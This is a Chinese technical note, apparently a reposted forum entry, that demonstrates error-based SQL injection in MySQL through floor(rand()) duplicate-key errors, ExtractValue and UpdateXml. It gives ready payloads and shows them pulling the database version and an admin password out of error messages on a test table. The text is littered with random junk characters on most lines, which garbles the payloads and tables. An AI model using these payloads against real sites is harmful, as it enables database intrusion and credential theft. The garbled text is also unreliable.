放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
% T* i( _1 ]( y$ q L/ |) N/ o6 o实际测试环境:. s* f/ x9 i! R& K+ m Y+ y
5 [, I3 g) Z4 P' Y g6 Z: Y7 K5 z* z8 I4 C3 b: @7 A
mysql> show tables;7 z" U. |5 }" u, d: X9 O/ N, q2 S
+----------------+
6 o3 `0 D. E6 H, m3 a" B9 C| Tables_in_test |
: R7 h7 y5 x7 M2 B7 h7 A* r+ B, {+----------------+
# k7 P0 Q: R! ]# d" w9 C( g+ z: R| admin |* Z2 b5 n( Y9 F* F4 u
| article |, P7 R: T1 s. I B3 |3 W; Y M& o
+----------------+
5 M# T7 v( v. b4 T 3 K w+ }' k2 Z2 h
% Q( t3 [) h" ^' ^$ w- |' G
4 i% ?) q2 R; G* imysql> describe admin;: p$ {0 W4 o+ l# v
+-------+------------------+------+-----+---------+----------------+' \7 H* x0 d0 o& t1 ?0 _+ `! y
| Field | Type | Null | Key | Default | Extra |
4 o( {* b) A9 n. X/ H3 d+-------+------------------+------+-----+---------+----------------+$ u' S2 I5 K4 P" j% K G
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
3 D$ q3 |1 k: u* n| user | varchar(50) | NO | | NULL | |
9 G/ V) I2 {- @$ A- n* d W| pass | varchar(50) | NO | | NULL | |
- C P' \* n/ x" {0 e( ~4 H: O+-------+------------------+------+-----+---------+----------------+
/ K5 V/ E6 \% `6 a c& b3 r; T0 r$ z
9 x& z* B! c# l3 ~) o
% b2 N0 w" P1 k1 j y5 T
mysql> describe article;
1 _+ C& s: O' p+ _' r5 D [; ]+---------+------------------+------+-----+---------+----------------+
; f( [5 E; r. G; P| Field | Type | Null | Key | Default | Extra |! C. Z- F3 t4 Y& ]
+---------+------------------+------+-----+---------+----------------+, Y3 U5 [$ F; \/ s6 K5 _% H
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
, E+ P# `9 P6 ^2 f: i9 g| title | varchar(50) | NO | | NULL | |- u) N* L# V, k, _7 F! M3 f; y
| content | varchar(50) | NO | | NULL | |: W7 n. P F, k1 W+ u
+---------+------------------+------+-----+---------+----------------+6 H7 J+ M9 } C* S+ @+ w
1、通过floor报错8 X8 \0 k5 O* \( ~9 r" @
可以通过如下一些利用代码
2 [6 A! g: ]$ ^6 o
. l5 I& R2 B" u( R! C( X- I
: T$ ^ Z% E2 g9 }5 c% dand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x* x6 i8 \/ I: u
from information_schema.tables group by x)a);3 E4 i( ^' O9 [1 a4 `9 \# P3 e. r% t
( V4 ?& A8 H( L }1 V1 w
a- I- P5 P. T/ L& G3 _and (select count(*) from (select 1 union select null union select !1)x
: P4 C" P9 t- B0 z( ^* I* A/ sgroup by concat((select table_name from information_schema.tables limit 1),
+ n# B, u2 F& M/ h# Q+ v% yfloor(rand(0)*2)));
+ G" c; |$ Q+ q5 G. o. K. L举例如下:; S8 H% i6 R+ j, A6 F
首先进行正常查询:
! Y! X! C! k$ u& L
* U8 b* {* l$ ]! E7 smysql> select * from article where id = 1;. w$ m" \- `3 z E
+----+-------+---------+: d" Q& y1 F* W( }0 i
| id | title | content |. ^+ L2 f' j: B# Q! g# A- D* |
+----+-------+---------+
& [) R! g9 S' D7 A0 z9 P( o( j| 1 | test | do it |: J& r; \$ j6 Q! H% Z" X# Y# @8 f4 x
+----+-------+---------+7 F% R, n, P$ t
假如id输入存在注入的话,可以通过如下语句进行报错。& `4 u3 V* \* [- f$ o |: I# t" t
2 y; I+ Y7 c u$ M; f 3 `" e2 d$ G/ Y7 U. V2 U
mysql> select * from article where id = 1 and (select 1 from9 K% r, V; B; e# p# S: ^, F4 n. |
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);' {% K1 p. o$ z$ M
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'+ x5 p0 n7 S; R; D/ m- t
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
h! @0 @# ?. F. Z& \4 y7 }) J例如我们需要查询管理员用户名和密码:
4 m, {6 {1 k/ h: R" SMethod1:$ y t, G0 p9 ~* R; z) _! M& o6 z8 Z
/ X J8 V5 l5 N. ~, v- u1 q
6 T) _" z( G5 n! z- g/ ?" Lmysql> select * from article where id = 1 and (select 1 from
( n$ c5 q+ [% S9 ^. P(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x4 d" V4 j( y1 L* s/ h
from information_schema.tables group by x)a);% p9 |/ D( W4 Z2 C) C6 Y) a
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'$ Q, K$ D( v: K0 g) x
Method2:
& g' Q5 e2 T) Y 3 K) l e9 h( E7 w: I6 [0 F/ a
8 K6 t4 R5 @, |" |
mysql> select * from article where id = 1 and (select count(*)7 z$ E: z2 B) m
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
2 Z# m3 O9 K1 M" o: y6 \3 `floor(rand(0)*2)));; B! r7 P" H# e+ }
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
1 [8 p9 c8 W2 d( |3 u& y( n0 v: V6 N& o2、ExtractValue! G- w% R2 A6 \( L- k d: e
测试语句如下7 p% h& ?' h% p8 f
3 |" V. T7 M3 M( t/ Q
2 G. Z( s( ~3 {5 p; w* yand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
; D* b4 j% w+ E: O实际测试过程6 y- U# n1 A& c! c2 `; r; b
; n6 Q5 p; m! r. |& i; J' B2 J- Q/ \ x
$ y1 W! k' {. z' H8 O# gmysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
' r. q- A' k- J Z5 x$ t) w(select pass from admin limit 1)));--" A7 F* Y; B) \4 c/ j J
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
: d3 ~5 y2 L. ?7 G3、UpdateXml+ b% m2 H& d+ e$ w
测试语句0 v4 S" m0 R8 F8 {
7 }5 E) k) i% k8 B
. z. g2 ?# B, C8 U; o3 land 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
: T( E4 q. }5 D* r; C实际测试过程
: P' M, r! O" g3 g6 x 2 P& `' Q$ N B& N& y& w
" k; ^ |8 q7 I6 m
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
V. B" l' A/ G* V. I1 w* t(select pass from admin limit 1),0x5e24),1));2 y! z5 p! f7 L$ L L1 h
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
+ P+ f# U9 [& OAll, thanks foreign guys.- E9 [1 T. I: M! Z. E
+ B0 l; I2 m* u* E1 Y
# C' m* q; E: L: X( D
|